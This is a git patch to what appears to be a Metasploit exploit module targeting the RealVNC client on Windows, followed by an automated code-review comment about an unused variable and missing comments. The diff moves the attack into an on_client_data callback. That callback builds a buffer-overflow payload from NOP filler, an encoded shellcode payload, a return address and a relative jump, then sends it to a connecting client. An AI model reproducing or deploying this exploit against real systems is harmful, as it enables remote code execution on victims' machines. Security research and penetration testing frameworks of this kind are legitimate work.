From cfdd264f2d794a4d77bbf1f6c19fb0f740fa40f5 Mon Sep 17 00:00:00 2001
From: Mario Ceballos
Date: Thu, 14 Dec 2006 22:39:36 +0000
Subject: [PATCH] module clean up for realvnc_client.rb

git-svn-id: file:///home/svn/framework3/trunk@4203 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/windows/vnc/realvnc_client.rb | 17 +++++++++--------
 1 file changed, 9 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb
index d5ab68a95c..c117e5741a 100644
--- a/modules/exploits/windows/vnc/realvnc_client.rb
+++ b/modules/exploits/windows/vnc/realvnc_client.rb
@@ -47,19 +47,20 @@ class Exploits::Windows::Vnc::Realvnc_Client < Exploit::Remote
 end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) - - filler = make_nops(993 - payload.encoded.length) rfb = "RFB 003.003\n" + client.put(rfb) + end + + def on_client_data(client) + return if ((p = regenerate_payload(client)) == nil) + + filler = make_nops(993 - payload.encoded.length) + sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + filler + payload.encoded sploit << [target.ret].pack('V') + make_nops(10) + [0xe8, -457].pack('CV') - sploit << Rex::Text.rand_text_english(200) - - client.put(rfb) - - on_client_data(16) + sploit << rand_text_english(200) print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...") client.put(sploit)
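Review bot: In the new `on_client_data`, the guard `return if ((p = regenerate_payload(client)) == nil)` binds `p`, but nothing in the hunk reads it; the following lines use `payload.encoded` instead, and the local also shadows `Kernel#p`. If the binding is not needed, `return if regenerate_payload(client).nil?` expresses the same guard without the dead local. Both callbacks are undocumented, so a comment above each would help, for example `# Sends only the RFB version banner; the reply is sent from on_client_data.` on `on_client_connect`, because the removed inline `on_client_data(16)` call was the only hint of that ordering. `on_client_data` continues past the end of the hunk, so the rest of its body cannot be checked from here.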